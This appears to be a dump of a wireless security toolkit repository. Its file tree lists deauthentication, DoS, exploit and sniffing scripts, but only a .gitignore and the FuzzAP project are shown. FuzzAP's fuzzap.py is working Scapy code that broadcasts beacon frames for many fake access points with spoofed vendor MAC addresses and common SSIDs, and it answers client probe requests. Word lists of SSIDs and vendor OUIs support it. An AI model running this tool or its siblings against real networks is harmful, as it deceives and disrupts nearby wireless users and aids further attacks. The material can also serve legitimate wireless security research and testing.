├── .gitignore ├── AP ├── FuzzAP │ ├── COPYING │ ├── README.md │ ├── common.txt │ ├── fuzzap.py │ └── ssid.txt ├── Soft-AP.py ├── ap-airbase.py ├── ap-lorcon.py ├── ap-scapy.py ├── fap.py └── fuzzap.py ├── EAP ├── eapmd5crack.py ├── eapmd5hcgen.py └── eapy.py ├── README.md ├── analyse.py ├── deauth ├── 4whsg.py ├── dea.py ├── psdos.py └── scapy-deauth.py ├── exploits ├── aircrack-sploit.py ├── aircrackpwn.py ├── cve-2012-2619.py └── tplink_dos.py ├── hopper.py ├── injmon.py ├── misc ├── dnspwn.py ├── honeypot.py ├── lorcon_examples │ ├── README │ ├── basic_ap.c │ ├── beacon_flood_lcpa.c │ ├── beacon_flood_raw.c │ ├── beacon_flood_raw.py │ └── lorcon.patch ├── mac.py ├── oui.py ├── oui.txt ├── pcap2wifinfo.py └── scapy80211.py ├── requirements.txt ├── scan ├── README.md └── wifiscan.py ├── sniff ├── airoscapy.py ├── dummy.py ├── iSniff.py ├── oneline.py ├── rawsock.py ├── whatsapp-sniff.py ├── wifilog.py └── wifiz.py ├── theremin.py ├── tweaks ├── bt5_easy_install.sh ├── install.sh ├── nolimits.sh ├── power_tweak.sh └── tuneup.sh ├── wp4.sh ├── wp5.sh └── wp6.sh /.gitignore: -------------------------------------------------------------------------------- 1 | # Created by .gitignore support plugin (hsz.mobi) 2 | ### JetBrains template 3 | # Covers JetBrains IDEs: IntelliJ, RubyMine, PhpStorm, AppCode, PyCharm 4 | 5 | *.iml 6 | 7 | ## Directory-based project format: 8 | .idea/ 9 | # if you remove the above rule, at least ignore the following: 10 | 11 | # User-specific stuff: 12 | # .idea/workspace.xml 13 | # .idea/tasks.xml 14 | # .idea/dictionaries 15 | 16 | # Sensitive or high-churn files: 17 | # .idea/dataSources.ids 18 | # .idea/dataSources.xml 19 | # .idea/sqlDataSources.xml 20 | # .idea/dynamic.xml 21 | # .idea/uiDesigner.xml 22 | 23 | # Gradle: 24 | # .idea/gradle.xml 25 | # .idea/libraries 26 | 27 | # Mongo Explorer plugin: 28 | # .idea/mongoSettings.xml 29 | 30 | ## File-based project format: 31 | *.ipr 32 | *.iws 33 | 34 | ## Plugin-specific files: 35 | 36 | # IntelliJ 37 | out/ 38 | 39 | # mpeltonen/sbt-idea plugin 40 | .idea_modules/ 41 | 42 | # JIRA plugin 43 | atlassian-ide-plugin.xml 44 | 45 | # Crashlytics plugin (for Android Studio and IntelliJ) 46 | com_crashlytics_export_strings.xml 47 | crashlytics.properties 48 | crashlytics-build.properties 49 | 50 | 51 | ### Python template 52 | # Byte-compiled / optimized / DLL files 53 | __pycache__/ 54 | *.py[cod] 55 | 56 | # C extensions 57 | *.so 58 | 59 | # Distribution / packaging 60 | .Python 61 | env/ 62 | build/ 63 | develop-eggs/ 64 | dist/ 65 | downloads/ 66 | eggs/ 67 | lib/ 68 | lib64/ 69 | parts/ 70 | sdist/ 71 | var/ 72 | *.egg-info/ 73 | .installed.cfg 74 | *.egg 75 | 76 | # PyInstaller 77 | # Usually these files are written by a python script from a template 78 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 79 | *.manifest 80 | *.spec 81 | 82 | # Installer logs 83 | pip-log.txt 84 | pip-delete-this-directory.txt 85 | 86 | # Unit test / coverage reports 87 | htmlcov/ 88 | .tox/ 89 | .coverage 90 | .cache 91 | nosetests.xml 92 | coverage.xml 93 | 94 | # Translations 95 | *.mo 96 | *.pot 97 | 98 | # Django stuff: 99 | *.log 100 | 101 | # Sphinx documentation 102 | docs/_build/ 103 | 104 | # PyBuilder 105 | target/ 106 | 107 | 108 | -------------------------------------------------------------------------------- /AP/FuzzAP/README.md: -------------------------------------------------------------------------------- 1 | FuzzAP 2 | ====== 3 | 4 | A python script for obfuscating wireless networks 5 | 6 | ''' 7 | Warning: I am not a programmer by trade, nor would I consider myself one 8 | 9 | The common SSID list was pulled from https://wigle.net/gps/gps/Stat 10 | The OUI vendor list was parsed from http://standards.ieee.org/develop/regauth/oui/oui.txt 11 | for well known vendors (netgear, cisco, linksys, d-link, atheros, ralink, apple) 12 | 13 | This idea was created based off of Black Alchemy's FakeAP 14 | http://www.blackalchemy.to/project/fakeap/ and Pettinger's airraid 15 | http://www.pettingers.org/code/airraid.html 16 | Some logic for parsing required info from packets was taken from Leandro Meiners 17 | (lea@coresecurity.com) at Core Security Technology's Power-Saving DoS script 18 | 19 | The main differences between these implementations is hardware requirements and how the 20 | fake access point is generated. 21 | 22 | FakeAP generates fake access points by creating an access point using iw and ifconfig 23 | with a PRISM-based wireless card. The problem is PRISM drivers are mostly deprecated in 24 | most modern distros. Even with a working driver and a PRISM card, I was unable to get 25 | FakeAP to work out of the box. 26 | 27 | AirRaid is almost identical to how FakeAP works. However, it is tailored towards Atheros- 28 | based cards and utilizes the madwifi drivers and utilities to create fake access points. 29 | The Madwifi projects seems to be mostly dying down in favor of ath5/9k drivers. 30 | Out-of-the-box, AirRaid no longer worked with my atheros card. 31 | 32 | Another problem with these implementations, was speed. As each fake access point was 33 | created, the wireless deviced had to be up-downed and reconfigured. 34 | 35 | This implementation differs in a number of ways. It is not totally hardware specific like 36 | FakeAP or AirRaid. Instead of creating a fake access point by changing the settings for 37 | the wireless adapter and having to reset and reconfigure the device, it takes advantage of 38 | wireless cards that support packet-injection. 39 | 40 | This helps in a number of ways. It supports far more adapters as well as a lot 41 | of modern drivers that support packet-injection and monitor-mode (rtl8187, ath5k, ath9k, 42 | most ralink, etc...). In short, any device that has drivers that can allow an adapter to 43 | run in monitor-mode via airmon-ng, can use this. Because this utilizes packet-injection 44 | instead of actually creating an access-point, it injects packets that look like they are 45 | from actual access points. 46 | 47 | This is my first project in python, so there are likely going to be flaws, inefficiencies, 48 | possible ways to detect which APs are the fake ones. I plan on improving this over time as 49 | problems are discovered and enhancements requested. 50 | 51 | One may need less than these requirements to make this work, but I know they work with 52 | the following: 53 | 54 | Atheros-based cards using ath5k and ath9k 55 | Realtek 8187 chipsets(ie Alfa AWUS 036H) 56 | Most Ralink chipsets 57 | 58 | This was coded in python 2.7 with Scapy 2.2.0. I really don't have a firm grasp on Scapy 59 | as their documentation is kind of thin, so anything done incorrectly, please let me know. 60 | airmon-ng was used to create the monitor interfaces which allows packet injection. 61 | 62 | I also realize this writeup is longer than the actual code. 63 | 64 | ------------------------------------------------------------------------------------------ 65 | 66 | To run: 67 | 68 | Requires python 2.7, Scapy 2.2.0, wireless card with drivers that support packet injection 69 | 70 | #####EARLY VERSION WARNING##### 71 | 72 | There is virtually no logging for this as I don't know scapy very well at this point, and 73 | when it sends beacon frames and probe responses, it sends "Sent 1 packets" to the terminal. 74 | When we are sending multiple packets a second, this spams your screen with "Sent 1 packets" 75 | I am currently working on finding a way around this and provide more useful logging. 76 | 77 | Make sure you have a wireless NIC in monitor mode with packet injection capabilities. I use 78 | the aircrack-ng suite's airmon-ng to do this: 79 | 80 | airmon-ng start \ 81 | 82 | Which should tell you the new virtual monitoring interface that has been created (something like 83 | mon 0) 84 | 85 | FuzzAP.py takes two required arguments. First argument is the interface to use, the second 86 | is the number of fake access points to generate. 87 | 88 | python fuzzap.py \ \ 89 | 90 | What it looks like from a client perspective: http://imgur.com/QsoFP1a 91 | 92 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 93 | ''' 94 | 95 | TODO: 96 | 97 | Bogus traffic between 'APs' and 'clients' 98 | Channel hopping 99 | -------------------------------------------------------------------------------- /AP/FuzzAP/common.txt: -------------------------------------------------------------------------------- 1 | 00:03:7f 2 | 00:03:93 3 | 00:04:5a 4 | 00:05:02 5 | 00:06:25 6 | 00:09:5b 7 | 00:0a:27 8 | 00:0a:95 9 | 00:0c:41 10 | 00:0d:93 11 | 00:0e:08 12 | 00:0f:66 13 | 00:0f:b5 14 | 00:10:fa 15 | 00:11:24 16 | 00:12:17 17 | 00:13:10 18 | 00:13:74 19 | 00:14:51 20 | 00:14:6c 21 | 00:14:bf 22 | 00:16:b6 23 | 00:16:cb 24 | 00:17:f2 25 | 00:18:39 26 | 00:18:4d 27 | 00:18:f8 28 | 00:19:e3 29 | 00:1a:70 30 | 00:1b:2f 31 | 00:1b:63 32 | 00:1c:10 33 | 00:1c:b3 34 | 00:1d:4f 35 | 00:1d:7e 36 | 00:1e:2a 37 | 00:1e:52 38 | 00:1e:c2 39 | 00:1e:e5 40 | 00:1f:33 41 | 00:1f:5b 42 | 00:1f:f3 43 | 00:21:29 44 | 00:21:e9 45 | 00:22:3f 46 | 00:22:41 47 | 00:22:6b 48 | 00:23:12 49 | 00:23:32 50 | 00:23:69 51 | 00:23:6c 52 | 00:23:df 53 | 00:24:36 54 | 00:24:b2 55 | 00:25:00 56 | 00:25:4b 57 | 00:25:9c 58 | 00:25:bc 59 | 00:26:08 60 | 00:26:4a 61 | 00:26:b0 62 | 00:26:bb 63 | 00:26:f2 64 | 00:30:65 65 | 00:3e:e1 66 | 00:50:e4 67 | 00:88:65 68 | 00:8e:f2 69 | 00:a0:40 70 | 00:b0:52 71 | 00:c6:10 72 | 00:f4:b9 73 | 04:0c:ce 74 | 04:15:52 75 | 04:1e:64 76 | 04:26:65 77 | 04:54:53 78 | 04:a1:51 79 | 04:db:56 80 | 04:e5:36 81 | 04:f1:3e 82 | 04:f7:e4 83 | 08:00:07 84 | 08:70:45 85 | 08:bd:43 86 | 0c:30:21 87 | 0c:3e:9f 88 | 0c:4d:e9 89 | 0c:74:c2 90 | 0c:77:1a 91 | 10:0d:7f 92 | 10:1c:0c 93 | 10:40:f3 94 | 10:93:e9 95 | 10:9a:dd 96 | 10:dd:b1 97 | 14:10:9f 98 | 14:5a:05 99 | 14:8f:c6 100 | 14:99:e2 101 | 18:20:32 102 | 18:34:51 103 | 18:9e:fc 104 | 18:af:61 105 | 18:af:8f 106 | 18:e7:f4 107 | 1c:ab:a7 108 | 1c:e6:2b 109 | 20:4e:7f 110 | 20:7d:74 111 | 20:aa:4b 112 | 20:c9:d0 113 | 20:e5:2a 114 | 24:a2:e1 115 | 24:ab:81 116 | 28:0b:5c 117 | 28:37:37 118 | 28:6a:b8 119 | 28:6a:ba 120 | 28:c6:8e 121 | 28:cf:da 122 | 28:cf:e9 123 | 28:e0:2c 124 | 28:e1:4c 125 | 28:e7:cf 126 | 2c:b0:5d 127 | 2c:b4:3a 128 | 30:10:e4 129 | 30:46:9a 130 | 30:90:ab 131 | 30:f7:c5 132 | 34:15:9e 133 | 34:51:c9 134 | 34:c0:59 135 | 38:0f:4a 136 | 38:48:4c 137 | 3c:07:54 138 | 3c:d0:f8 139 | 3c:e0:72 140 | 40:30:04 141 | 40:3c:fc 142 | 40:6c:8f 143 | 40:a6:d9 144 | 40:b3:95 145 | 40:d3:2d 146 | 44:2a:60 147 | 44:4c:0c 148 | 44:94:fc 149 | 44:d8:84 150 | 44:fb:42 151 | 48:60:bc 152 | 48:74:6e 153 | 48:f8:b3 154 | 4c:60:de 155 | 4c:8d:79 156 | 4c:b1:99 157 | 50:ea:d6 158 | 54:26:96 159 | 54:72:4f 160 | 54:ae:27 161 | 54:e4:3a 162 | 54:ea:a8 163 | 58:1f:aa 164 | 58:55:ca 165 | 58:6d:8f 166 | 58:b0:35 167 | 5c:59:48 168 | 5c:95:ae 169 | 5c:96:9d 170 | 5c:f9:38 171 | 60:03:08 172 | 60:33:4b 173 | 60:69:44 174 | 60:c5:47 175 | 60:fa:cd 176 | 60:fb:42 177 | 60:fe:c5 178 | 64:20:0c 179 | 64:a3:cb 180 | 64:b9:e8 181 | 64:e6:82 182 | 68:09:27 183 | 68:5b:35 184 | 68:7f:74 185 | 68:96:7b 186 | 68:9c:70 187 | 68:a8:6d 188 | 6c:3e:6d 189 | 6c:c2:6b 190 | 70:11:24 191 | 70:56:81 192 | 70:73:cb 193 | 70:cd:60 194 | 70:de:e2 195 | 74:44:01 196 | 74:e1:b6 197 | 74:e2:f5 198 | 78:31:c1 199 | 78:6c:1c 200 | 78:a3:e4 201 | 78:ca:39 202 | 7c:11:be 203 | 7c:6d:62 204 | 7c:c3:a1 205 | 7c:c5:37 206 | 7c:d1:c3 207 | 7c:f0:5f 208 | 7c:fa:df 209 | 80:00:6e 210 | 80:49:71 211 | 80:92:9f 212 | 80:ea:96 213 | 84:1b:5e 214 | 84:29:99 215 | 84:38:35 216 | 84:85:06 217 | 84:8e:0c 218 | 84:fc:fe 219 | 88:12:4e 220 | 88:1f:a1 221 | 88:53:95 222 | 88:c6:63 223 | 88:cb:87 224 | 8c:00:6d 225 | 8c:29:37 226 | 8c:2d:aa 227 | 8c:58:77 228 | 8c:7b:9d 229 | 8c:7c:92 230 | 8c:fa:ba 231 | 90:27:e4 232 | 90:72:40 233 | 90:84:0d 234 | 90:b2:1f 235 | 90:b9:31 236 | 94:94:26 237 | 98:03:d8 238 | 98:b8:e3 239 | 98:d6:bb 240 | 98:f0:ab 241 | 98:fc:11 242 | 98:fe:94 243 | 9c:04:eb 244 | 9c:20:7b 245 | 9c:d3:6d 246 | a0:21:b7 247 | a0:ed:cd 248 | a4:67:06 249 | a4:b1:97 250 | a4:c3:61 251 | a4:d1:d2 252 | a8:20:66 253 | a8:86:dd 254 | a8:88:08 255 | a8:96:8a 256 | a8:bb:cf 257 | a8:fa:d8 258 | ac:3c:0b 259 | ac:7f:3e 260 | ac:cf:5c 261 | ac:fd:ec 262 | b0:34:95 263 | b0:65:bd 264 | b0:9f:ba 265 | b4:18:d1 266 | b4:f0:ab 267 | b8:17:c2 268 | b8:78:2e 269 | b8:8d:12 270 | b8:c7:5d 271 | b8:e8:56 272 | b8:f6:b1 273 | b8:ff:61 274 | bc:3b:af 275 | bc:52:b7 276 | bc:67:78 277 | bc:92:6b 278 | c0:3f:0e 279 | c0:63:94 280 | c0:84:7a 281 | c0:9f:42 282 | c0:c1:c0 283 | c4:04:15 284 | c4:2c:03 285 | c4:3d:c7 286 | c8:2a:14 287 | c8:33:4b 288 | c8:6f:1d 289 | c8:b3:73 290 | c8:b5:b7 291 | c8:bc:c8 292 | c8:e0:eb 293 | cc:08:e0 294 | cc:78:5f 295 | d0:23:db 296 | d0:e1:40 297 | d4:9a:20 298 | d8:00:4d 299 | d8:30:62 300 | d8:96:95 301 | d8:9e:3f 302 | d8:a2:5e 303 | d8:d1:cb 304 | dc:2b:61 305 | dc:86:d8 306 | dc:9b:9c 307 | e0:46:9a 308 | e0:91:f5 309 | e0:b9:ba 310 | e0:c9:7a 311 | e0:f5:c6 312 | e0:f8:47 313 | e4:25:e7 314 | e4:8b:7f 315 | e4:98:d6 316 | e4:c6:3d 317 | e4:ce:8f 318 | e8:04:0b 319 | e8:06:88 320 | e8:8d:28 321 | ec:35:86 322 | ec:85:2f 323 | f0:b4:79 324 | f0:c1:f1 325 | f0:cb:a1 326 | f0:d1:a9 327 | f0:db:f8 328 | f0:dc:e2 329 | f0:f6:1c 330 | f4:1b:a1 331 | f4:37:b7 332 | f4:f1:5a 333 | f4:f9:51 334 | f8:1e:df 335 | f8:27:93 336 | fc:25:3f 337 | -------------------------------------------------------------------------------- /AP/FuzzAP/fuzzap.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- encoding: utf-8 -*- 3 | ''' 4 | Copyright 2013 Brendan Scherer 5 | 6 | This program is free software: you can redistribute it and/or modify 7 | it under the terms of the GNU General Public License as published by 8 | the Free Software Foundation, either version 3 of the License, or 9 | (at your option) any later version. 10 | 11 | This program is distributed in the hope that it will be useful, 12 | but WITHOUT ANY WARRANTY; without even the implied warranty of 13 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 14 | GNU General Public License for more details. 15 | 16 | You should have received a copy of the GNU General Public License 17 | along with this program. If not, see . 18 | 19 | Small portion of code was taken from Core Security Technologies' Power-saving DoS. 20 | Their copyright follows, their code is marked below 21 | 22 | # Copyright (c) 2009 Core Security Technologies 23 | # 24 | # Author: Leandro Meiners (lea@coresecurity.com) 25 | # 26 | # Permission to use, copy, modify, and distribute this software for any 27 | # purpose with or without fee is hereby granted, provided that the above 28 | # copyright notice and this permission notice appear in all copies. 29 | # 30 | # THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES 31 | # WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF 32 | # MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR 33 | # ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES 34 | # WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN 35 | # ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF 36 | # OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. 37 | 38 | The common SSID list was pulled from https://wigle.net/gps/gps/Stat 39 | The OUI vendor list was parsed from http://standards.ieee.org/develop/regauth/oui/oui.txt 40 | for well known vendors (netgear, cisco, linksys, d-link, atheros, ralink, apple) 41 | 42 | ''' 43 | 44 | #!/usr/bin/python 45 | 46 | import signal 47 | import logging 48 | 49 | logging.getLogger("scapy.runtime").setLevel(logging.ERROR) 50 | from scapy.layers.dot11 import * 51 | from scapy.utils import * 52 | import argparse 53 | import random 54 | from multiprocessing import Process 55 | 56 | mlist = [] 57 | sid = [] 58 | ftime = time.time() * 1000000 59 | parser = argparse.ArgumentParser() 60 | parser.add_argument("interface", help="Specifies the interface in monitor mode to use") 61 | parser.add_argument("APs", help="Number of fake access points to create", type=int) 62 | 63 | args = parser.parse_args() 64 | ifce = args.interface 65 | APs = args.APs 66 | 67 | 68 | def uptime(): 69 | microtime = int(round(time.time() * 1000000)) - ftime 70 | return microtime 71 | 72 | 73 | def generate_mac(): 74 | try: 75 | # Grab a common OUI from file based off of the IEEE list at http://standards.ieee.org/develop/regauth/oui/oui.txt 76 | mac = random.choice(open("common.txt").readlines()) 77 | 78 | except IOError as ioe: 79 | print "Cannot read common.txt. Does the file exist? Do you have permissions? {0}: {1}".format(ioe.errno, 80 | ioe.strerror) 81 | 82 | iter = 0 83 | 84 | # We have to create the last three bits of the mac address since we grabbed the first three from file 85 | while iter < 3: 86 | 87 | # Generate a random integer between 0 and 255 to match the possible combinations for the MAC 88 | ranint = random.randint(0, 255) 89 | int2 = 0 90 | 91 | #We have an exception in case the random integer is less than 16, as we would only get one character instead of two 92 | if ranint < 16: 93 | 94 | int2 = random.randint(0, 15) 95 | mac += ":" + hex(ranint)[2:] + hex(int2)[2:] 96 | iter += 1 97 | 98 | else: 99 | 100 | mac += ":" + hex(ranint)[2:] 101 | iter += 1 102 | 103 | # When we return the mac, it has newlines due to reading from file. We need to strip those before we return the mac 104 | return mac.replace("\n", "") 105 | 106 | 107 | def beacon_frame(bssids, macaddrs, ifce): 108 | while True: 109 | for n in range(len(bssids)): 110 | sendp(RadioTap() / 111 | Dot11(addr1="ff:ff:ff:ff:ff:ff", 112 | addr2=macaddrs[n], 113 | addr3=macaddrs[n]) / 114 | Dot11Beacon(cap="ESS", timestamp=uptime()) / 115 | Dot11Elt(ID="SSID", info=bssids[n]) / 116 | Dot11Elt(ID="Rates", info='\x82\x84\x0b\x16') / 117 | Dot11Elt(ID="DSset", info="\x03") / 118 | Dot11Elt(ID="TIM", info="\x00\x01\x00\x00"), 119 | iface=ifce, loop=0, verbose=False) 120 | time.sleep(.102) 121 | 122 | 123 | def load_vendor(num_of_aps): 124 | # Generate some mac addresses and shove them in a list 125 | for n in range(num_of_aps): 126 | mlist.append(generate_mac()) 127 | 128 | 129 | def load_ssid(num_of_aps): 130 | # Grab some random SSIDs from the wigle list and shove'm in a list 131 | for n in range(num_of_aps): 132 | sid.append(generate_ssid()) 133 | 134 | 135 | def generate_ssid(): 136 | try: 137 | # Pull a random SSID from a file with the top 1000 most common SSIDs from https://wigle.net/gps/gps/Stat 138 | 139 | ssid = random.choice(open("ssid.txt").readlines()) 140 | 141 | except IOError as ioer: 142 | print "Could not open ssid.txt. Does the file exist? Do you have the correct permissions? {0}: {1}".format( 143 | ioer.errno, ioer.strerror) 144 | 145 | # Return the SSID from file while stripping the new-line from the output 146 | return ssid.replace("\n", "") 147 | 148 | 149 | def probe_response(ssid, macs, rates, stamac, ifce): 150 | sendp(RadioTap(present=18479L) / 151 | Dot11(addr2=macs, addr3=macs, addr1=stamac, FCfield=8L) / 152 | Dot11ProbeResp(beacon_interval=102, cap=12548L, timestamp=uptime()) / 153 | Dot11Elt(info=ssid, ID=0) / 154 | Dot11Elt(info=rates, ID=1) / 155 | Dot11Elt(info='\x01', ID=3, len=1) / 156 | Dot11Elt(info='\x00', ID=42, len=1) / 157 | Dot11Elt(info='\x01\x00\x00\x0f\xac\x02\x02\x00\x00\x0f\xac\x02\x00\x0f\xac\x04\x01\x00\x00\x0f\xac\x02(\x00', 158 | ID=48, len=24) / 159 | Dot11Elt(info='H`l', ID=50, len=3), iface=ifce, loop=0, verbose=False) 160 | 161 | 162 | def sig_int(sigint, frame): 163 | print("Shutting down....") 164 | sys.exit(0) 165 | 166 | 167 | def main(): 168 | signal.signal(signal.SIGINT, sig_int) 169 | 170 | # load all of our MACs and SSIDs to spam 171 | load_vendor(APs) 172 | load_ssid(APs) 173 | 174 | #Fork out the beacon frames 175 | Process(target=beacon_frame, args=(sid, mlist, ifce)).start() 176 | 177 | #Start sniffing for probe request from our previously forked out beacon frames, and grab the ssid, rates, and MAC they are referencing 178 | while True: 179 | ssid = None 180 | rates = None 181 | macs = None 182 | 183 | #start sniffing 184 | p = sniff(iface=ifce, count=1)[0] 185 | 186 | #If the sniffed packet is a probe request and is sending it to one of our MAC addresses 187 | if p.haslayer(Dot11ProbeReq) and p.addr1 in mlist: 188 | pkt = p.getlayer(Dot11Elt) 189 | macs = p.addr1 190 | 191 | # Start Core Security's code 192 | while pkt: 193 | if pkt.ID == 0: 194 | #ID 0's info portion of a 802.11 packet is the SSID, grab it 195 | ssid = pkt.info 196 | if pkt.ID == 1: 197 | #ID 1's info portion of a 802.11 packet is the supported rates, grab it 198 | rates = pkt.info 199 | pkt = pkt.payload 200 | #End Core Security's code 201 | 202 | probe_response(ssid, macs, rates, p.addr2, ifce) 203 | 204 | 205 | main() 206 | -------------------------------------------------------------------------------- /AP/FuzzAP/ssid.txt: -------------------------------------------------------------------------------- 1 | linksys 2 | 3 | default 4 | NETGEAR 5 | Wireless 6 | WLAN 7 | Belkin54g 8 | MSHOME 9 | home 10 | hpsetup 11 | smc 12 | tsunami 13 | ACTIONTEC 14 | orange 15 | USR8054 16 | 101 17 | tmobile 18 | 19 | SpeedStream 20 | linksys-g 21 | 3Com 22 | WaveLAN Network 23 | Wayport_Access 24 | hhonors 25 | pi07490509x 26 | pi07490509x09 27 | Motorola 28 | SST-PR-1 29 | ANY 30 | eurospot 31 | 188ALT 32 | Gateway 33 | HomeNet 34 | GoldenTree 35 | SITECOM 36 | ConnectionPoint 37 | 38 | Philips WiFi 39 | Customer ID 40 | PCX5000 41 | arescom 42 | Wireless Network 43 | Office 44 | Blitzz 45 | Airport 46 | INTERMEC 47 | freedomlink 48 | MSFTWLAN 49 | MIT 50 | Untitled 51 | GlobalSuiteWireless 52 | Cox-Hospitality 53 | NESPOT 54 | DLINK 55 | Home Network 56 | non-specified SSID !! 57 | USR8022 58 | WLCM 59 | RGXLPQSNGBNYVRAK 60 | 188 61 | bestbuy 62 | airportthru 63 | 130 64 | workgroup 65 | mobile 66 | HomeOffice 67 | test 68 | fa1779zvpo 69 | Harvard University 70 | 72653 71 | HOMENETWORK 72 | USR9106 73 | linksys1 74 | NETWORK 75 | My Wireless Network A 76 | 5ECUR3w3p5TOR3 77 | conexant 78 | SMARTSIGHT 79 | Guest 80 | 0CP2REDS0X 81 | public 82 | Truckstop.neT 83 | D-LINK 84 | UBC 85 | G604T_WIRELESS 86 | matrix 87 | goesh 88 | Topcom 89 | stayonline 90 | fanTM 91 | d 92 | BNDEMO 93 | Intel Gateway 94 | IU Wireless 95 | etwireless 96 | HomeRun 97 | 140 98 | Thomson 99 | AP_Router 100 | roomlinx 101 | SpeedLinks 102 | Verizon Wi-Fi 103 | WiFi 104 | Internet 105 | linksys2 106 | STSN 107 | mike 108 | medion 109 | d0llartree1nc 110 | FDSSEC 111 | CPSWIRELESS 112 | router 113 | USR5462 114 | david 115 | Homestead 116 | Thuis 117 | NETGEAR_11g 118 | benq 119 | Comcast 120 | john 121 | 122 | net 123 | House 124 | flyingj 125 | WLAN-AP 126 | HomeWireless 127 | home wireless 128 | Ethostream 129 | usr2249 130 | Chris 131 | Private 132 | g3n3r1cw8p 133 | cuairnet 134 | west 135 | T-Mobile_T-Com 136 | RCA 137 | holidayinn 138 | V1500 139 | steve 140 | KC_LV_2003 141 | Wireless1 142 | WLAN-PS 143 | homebase 144 | BWA711 145 | My Network 146 | sonicwall 147 | bridge 148 | IBM 149 | CMU 150 | PwC80211 151 | mycloud 152 | home1 153 | Michael 154 | Belkin 155 | Scott 156 | bob 157 | TELUS 158 | asu 159 | USR5450 160 | cvsretail 161 | laptop 162 | AZRF 163 | mark 164 | FRITZ!Box Fon WLAN 165 | utexas 166 | AT&T 167 | COMPAQ 168 | buffalo 169 | LODGE 170 | FRITZ!Box SL WLAN 171 | Skynet 172 | SkyHighSpeed 173 | hawking 174 | 122 175 | Pal 176 | My Wireless Network B 177 | linksys123 178 | ZyXEL 179 | CapCBR 180 | PASSYM 181 | ap 182 | Robert 183 | defcon 184 | GlobalSync 185 | Family 186 | 3blindmice 187 | hp 188 | airport network 189 | TI-AR7WRD 190 | Air2Data 191 | tigernet 192 | PANERA 193 | netpoint 194 | BTOpenzone 195 | Brian 196 | homelan 197 | datavalet 198 | intelwlan 199 | 72654 200 | TA 201 | Kevin 202 | WRC_Network 203 | STSN_Conf 204 | OMNI 205 | Jason 206 | jeff 207 | RoamAbout Default Network Name 208 | James 209 | On-Net 210 | airpath 211 | dgs769157 212 | typhoon 213 | myhome 214 | Telenor Mobil WLAN 215 | mywlan 216 | DaysInn 217 | Apartment 218 | PWLAN1 219 | mynetwork 220 | philips 221 | default-ssid 222 | 11g AP 223 | Apple Network 224 | 1cst0ck8 225 | pennstate 226 | UPSTAIRS 227 | george 228 | Dave 229 | WAG0Nwhee1 230 | surfhere 231 | GPCSTORE 232 | vodafone 233 | Paul 234 | casa 235 | 2 236 | 04PPk99 237 | 123 238 | smith 239 | FRITZ!Box Fon WLAN 7050 240 | CISCO 241 | IEEE 802.11b LAN 242 | laquinta 243 | Spark 244 | CEDSAP 245 | 0 Unknown 246 | Instant Internet 247 | joe 248 | KPN 249 | @home 250 | Miller 251 | link 252 | AirWave 253 | comfortinn 254 | tom 255 | acer 256 | ap1 257 | LiteShow 258 | TEKLOGIX 259 | ssid 260 | johnson 261 | MU-WIRELESS-LITE 262 | EASE 263 | Apple 264 | Blue 265 | skyriver 266 | freedom 267 | peter 268 | Vanilla 269 | IEEE 802.11 LAN 270 | mywireless 271 | SiriCOMM 272 | thomas 273 | LockOn 274 | sboca 275 | Wingate 276 | brown 277 | visitor 278 | Heb1905 279 | fred 280 | 111 281 | FG04Apr06MBS 282 | comfort 283 | hyatt 284 | Alex 285 | turbonet 286 | monkey 287 | Jim 288 | nowireapaccess 289 | Webstar 290 | Main 291 | martin 292 | Richard 293 | Home Office 294 | eric 295 | tony 296 | RTC 297 | jah719 298 | Matt 299 | bill 300 | yale wireless 301 | BSU 302 | HOMEWLAN 303 | scandic_easy 304 | RYAN 305 | pi07490509xsa 306 | TELENETHOTSPOT 307 | WNR2004 308 | WANO 309 | AT&T Wireless 310 | Stanford 311 | wirelesslan 312 | frank 313 | AP7XR 314 | HBS 315 | mine 316 | 1 317 | University of Washington 318 | Access 319 | Williams 320 | HotSpot 321 | SILENTWITNESS 322 | UCSD 323 | ea54 324 | Andrew 325 | HotelAir 326 | WORK 327 | Sam 328 | taylor 329 | Super8 330 | GoAway 331 | ASAP 332 | hwtvm 333 | homer 334 | Gary 335 | TI 336 | fatport 337 | Kelly 338 | 2WIRE618 339 | 2WIRE567 340 | linksysxx 341 | 2WIRE550 342 | cavalier 343 | 2WIRE784 344 | WSR-5000 345 | WirelessNet 346 | digitalpath.net 347 | 2WIRE555 348 | 102 349 | wirelesshome 350 | belgacom 351 | 2WIRE467 352 | kaisicher 353 | JONES 354 | 2WIRE836 355 | 2WIRE658 356 | 2WIRE645 357 | 2WIRE215 358 | 2WIRE326 359 | 2WIRE264 360 | 2WIRE872 361 | 2WIRE544 362 | 2WIRE510 363 | larry 364 | GTW 365 | DAN 366 | anderson 367 | 2WIRE623 368 | 2WIRE329 369 | 2WIRE272 370 | 2WIRE212 371 | 2WIRE426 372 | tdc 373 | 2WIRE808 374 | 2WIRE577 375 